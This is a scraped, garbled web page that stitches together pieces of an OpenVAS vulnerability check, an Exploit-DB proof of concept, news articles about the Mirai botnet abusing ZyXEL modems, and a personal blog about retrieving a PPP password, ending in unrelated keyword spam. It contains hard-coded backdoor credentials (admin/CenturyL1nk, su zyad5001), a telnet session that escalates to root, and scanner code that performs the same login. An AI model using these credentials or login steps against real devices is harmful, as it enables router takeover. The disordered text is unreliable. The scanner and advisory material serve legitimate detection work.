", "published": "2017-11-02T00:00:00", "modified": "2019-09-06T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112100", "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://www.exploit-db.com/exploits/43105/", "https://www.reddit.com/r/centurylink/comments/5lt07r/zyxel_c1100z_default_lanside_telnet_login/", "https://thehackernews.com/2017/11/mirai-botnet-zyxel.html", "https://forum.openwrt.org/viewtopic.php?id=62266"], "cvelist": ["CVE-2016-10401"], "lastseen": "2019-09-09T15:17:17", "viewCount": 1829, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-10401"]}, {"type": "threatpost", "idList": ["THREATPOST:6E693403866ABC7ED2D08FC5260228A7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144851"]}, {"type": "thn", "idList": ["THN:B9EAC52AD9207F731418E005089C2AF5"]}, {"type": "zdt", "idList": ["1337DAY-ID-28943"]}, {"type": "exploitdb", "idList": ["EDB-ID:43105"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:91618FCF772C95FA8F74734914A599E7"]}], "modified": "2019-09-09T15:17:17", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2019-09-09T15:17:17", "rev": 2}, "vulnersScore": 8.0}, "pluginID": "1361412562310112100", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ZyXEL Modems Backup Telnet Account and Default Root Credentials\n#\n# Authors:\n# Adrian Steins \n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. telnet 192.168.0.1 Bottom Line: Here’s how to get your PPP password for a Zyxel C1000Z modem so you can put it into bridge mode and use your router instead. Step 7: Go back to the TELNET setting on GUI.Disable the TELNET service to secure the device. over three years, ZyXEL is a global-provider of equipment supporting dual-stack IP networks and provides this feature on many current ZyXEL products, including the C1100Z. banner )\n exit( 0 );\n\nif( \"PK5001Z login:\" >< banner || \"BCM963268 Broadband Router\" >< banner ) found = TRUE;\n\nif ( found ) {\n\n login = \"admin\";\n passwords = make_list( \"CenturyL1nk\", \"CentryL1nk\", \"QwestM0dem\" );\n root_pass = \"zyad5001\";\n\n report = 'The following issues have been found:\\n';\n\n foreach pass( passwords ) {\n soc = open_sock_tcp( port );\n if( ! My first attempt was going through the modem configuration pages, where I saw the spaces to input PPP info, with the password obscured by asterisks. Brought to you by Nathan Henrie. Just had the installer drop off my new ZyXel C1100z modem and enable service.

Because the modem generally does the PPP authentication, that’s where we have to look for the credentials. \n \n**3\\. Unfortunately, decoding it only left me with Salted__bunchofoddcharacters… which didn’t work at all, since I didn’t know their salt or what algorithm they were using. \n \n**2\\. I recently changed from internet service providers from Comcast to CenturyLink. Connect an Ethernet cable from a LAN port on the ZyXel router to a LAN port on the Airport. The new variant adds more devices to this list. The largest of such attacks flooded [DNS provider Dyn]() causing several well-known websites \u2013 Twitter, Spotify and Netflix \u2013 to go dark for hours.\n\nNetlab said that this new Mirai variant is actively leveraging two new credentials, admin/CenturyL1nk and admin/QwestM0dem, identified in an [exploit database last month]().\n\n[! {"id": "OPENVAS:1361412562310112100", "type": "openvas", "bulletinFamily": "scanner", "title": "ZyXEL Modems Backup Telnet Account and Default Root Credentials", "description": "ZyXEL PK5001Z and C1100Z modems have default root credentials set and a backdoor account with hard-coded credentials. Finally, I ran across a few links that were instrumental to me figuring everything out: Basically, I followed their instructions to turn on telnet access (making sure to turn it off again afterwards), and ran the below commands (either / or — they should give you the same password). \n \nThe targeted port scans are actively looking for vulnerable internet-connected devices manufactured by ZyXEL Communications using two default telnet credential combinations\u2014**admin/CentryL1nk** and **admin/QwestM0dem**\u2014to gain root privileges on the targeted devices. \nEscape character is '^]'. \n\n\n[! Exactly a year before, [millions of Zyxel routers]() were found vulnerable to a critical remote code execution flaw, which was exploited by Mirai. Overall, I’m pleased with the change (mostly because I’m paying about 1/3 the price for a negligible difference in speed — and I was finally able to turn in all that Comcast TV equipment that’s been sitting in my closet for the last 3 years).

[](https://media.threatpost.com/wp-content/uploads/sites/103/2017/11/06222054/1_time_curve_of_two_new_credential_in_honeypot.png)]()\n\nTwo new credentials being actively abused.\n\nResearchers said adversaries have automated the process of logging into ZyXEL devices using telnet credentials and coupled that with a separate hard coded superuser vulnerability ([CVE-2016-10401]()) to gain root privileges on targeted devices.\n\n\u201cZyXEL PK5001Z devices have zyad5001 as the su (superuser) password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP\u2019s deployment of these devices),\u201d according to the CVE description of the vulnerability.\n\nSpeaking with the publication Bleeping Computer, Netlab researchers said there has been a spike by attackers leveraging publicly disclosed details of the exploit since it was released in October.\n\n\u201cThe PoC published last month automates the process of logging into a remote ZyXEL device using one of the two telnet passwords, and then uses the hardcoded su password to gain root privileges,\u201d researchers told the Bleepining Computer website.\n\nAccording to Qihoo 360 researchers, the abuse of these two credentials began on Nov. 22 and reached its peak the next morning. The past firmware did not have this feature and simply allowed you to login via ssh/telnet and then type 'sh' to drop into a simple Busybox shell. sh \n \n\n\n### Secure Your (Easily Hackable) Internet-Connected Devices\n\n \n**1\\. But I’m not writing to talk about CenturyLink, I’m writing to show others how I was finally able to get my PPP password from my CenturyLink modem for use with my new(ish) router: an Apple Airport Extreme. www.zyxel.com Step 6: Enter the CLI command “write” to save the configuration changes. So, naturally, first thing I Telnet'd in. [iot-botnet](https://2.bp.blogspot.com/--ucFyeWzuEQ/Wh1xHvg61YI/AAAAAAAAu9c/B-o05G3mdes92AVCUsl3bA_82puiwEMwACLcBGAs/s1600/iot-botnet.png)]()\n\n \nMirai-based attacks experienced sudden rise after someone publicly released its[ source code]() in October 2016. Being a Python guy, I initially did this: but I later realized I could have saved myself some typing and just done this: Once I had my decoded password, I plugged it into my Airport Extreme with the username from the XML config file lastname_firstname@qwest.net and it worked like a charm. I recently changed from internet service providers from Comcast to CenturyLink. \r\n# Linked CVE's: CVE-2016-10401\r\n \r\n \r\nHardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet\r\n \r\nusername: admin\r\npassword: CenturyL1nk\r\n \r\nEscalate to root with 'su' and this password.\r\n\r\npassword: zyad5001\r\n\r\n\r\n[root:/]# telnet 192.168.0.1\r\nTrying 192.168.0.1...\r\nConnected to 192.168.0.1.\r\nEscape character is '^]'.\r\n\r\nPK5001Z login: admin\r\nPassword: CenturyL1nk\r\n$ whoami\r\nadmin_404A03Tel\r\n$ su\r\nPassword: zyad5001\r\n# whoami\r\nroot\r\n# uname -a\r\nLinux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown\r\n# cat /etc/zyfwinfo\r\nVendor Name: ZyXEL Communications Corp.\r\n\r\n\r\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43105/"}], "packetstorm": [{"lastseen": "2017-11-03T14:05:30", "description": "", "published": "2017-11-02T00:00:00", "type": "packetstorm", "title": "ZyXEL PK5001Z Modem Backdoor Account", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10401"], "modified": "2017-11-02T00:00:00", "id": "PACKETSTORM:144851", "href": "https://packetstormsecurity.com/files/144851/ZyXEL-PK5001Z-Modem-Backdoor-Account.html", "sourceData": "`# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. Keep in mind; Mirai malware scans for default settings. Learn about the Zyxel C1100Z modem/router, including setup, checking modem status, wireless settings, utilities and advanced features.

Zyxel C1100Z - wireless router - DSL modem - 802.11b/g/n - desktop overview and full product specs on CNET. It has also been used in previous Mirai attacks. C1100Z 802.11n VDSL2 Wireless Gateway • 300 Mbps 802.11n access point • Standards based WPS simplifies secure WLAN setup • IPv6 6rd and dual stack support soc ) continue;\n\n recv = recv( socket:soc, length:2048 );\n\n if ( \"PK5001Z login:\" >< recv || \"Login:\" >< recv ) {\n send( socket:soc, data: tolower( login ) + '\\r\\n' );\n recv = recv( socket:soc, length:128 );\n\n if( \"Password:\" >< recv ) {\n send( socket:soc, data: pass + '\\r\\n\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n send( socket:soc, data: 'whoami\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n if( recv =~ \"admin\" ) {\n VULN = TRUE;\n report += '\\n\\nIt was possible to login via telnet using the following backup credentials:\\n';\n report += 'Login: ' + login + ', Password: ' + pass;\n }\n\n send( socket:soc, data: 'su\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n send( socket:soc, data: root_pass + '\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n send( socket:soc, data: 'cat /etc/zyfwinfo\\r\\n' );\n recv = recv( socket:soc, length:1024 );\n\n if( recv =~ \"ZyXEL Communications Corp.\" ) {\n VULN = TRUE;\n report += '\\n\\nIt was possible to escalate to root privileges with the following root password: ' + root_pass;\n }\n }\n }\n\n close( soc );\n }\n\n if( VULN ) {\n security_message( port:port, data:report );\n exit( 0 );\n } else {\n exit( 99 );\n }\n}\n\nexit( 0 );\n", "naslFamily": "Default Accounts"}, {"cve": [{"lastseen": "2020-10-03T12:10:40", "description": "ZyXEL PK5001Z devices have zyad5001 as the su password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP's deployment of these devices).

Fatal Car Accident Oconee County, Sc Today, Shell Chennai Office, Watkins Consultant Login, Explain Heat Treatment Process Annealing In Detail, Andrews Furniture - Abilene, Tx, Marriage Without Legal Binding, Does Fibromyalgia Shorten Your Life, Kuch Khatti Kuch Meethi Cast, Note 20 Ultra Xbox Game Pass, How Old Is Pippa Taylor, Russian Snacks Online, In The Winter Dark Quotes, Benefit Pearl Primer Vs Porefessional, St John Xxiii, Be In A Sentence For Kindergarten, James Worthy Goggles, Buy Cheap Bourbon Online, Senior Intelligence Analyst Job Description, Methyl Propionate Synthesis, Pandemic Ebt Illinois, Best Blade Length For Self Defense, Why Is Divine Vs Demonic So Expensive, Laura Ashley Oak Sideboard, Phoros Keto Pancake & Waffle Mix, Bass Fishing Catawba River, Nongshim Shin Noodle Soup Bowl Review, Powera Replacement Battery, Ux Design Challenge Presentation, Weight Gain Exercise Without Equipment, Uk Population Pyramid 2017, Beyond The Horizon Meaning, Gino D'acampo Recipes Chicken, What Is The Past Tense Of Explain, Shows About Fashion, Uk Police Pension Calculator, Spongilla Lacustris Class, Assassin's Creed 3 Ending, Defence Intelligence Agency Recruitment, Charter Communications Board Of Directors, Greek Desserts Recipes, Bucking Bull Calves For Sale, Duel Decks: Blessed Vs Cursed, Contemporary Indigenous Australian Art, Aguilar Tone Hammer Dimensions, Mind Of A Chef David Kinch, Light Vs Heavy Guitar Strings, History Of Gin, Assassins Creed: Ezio Trilogy, Scottish Mortgage Share Price, Kailey Name Popularity, Organic Taco Seasoning, Social Worker Mother Teresa Essay, Bed Head Superstar Queen For A Day,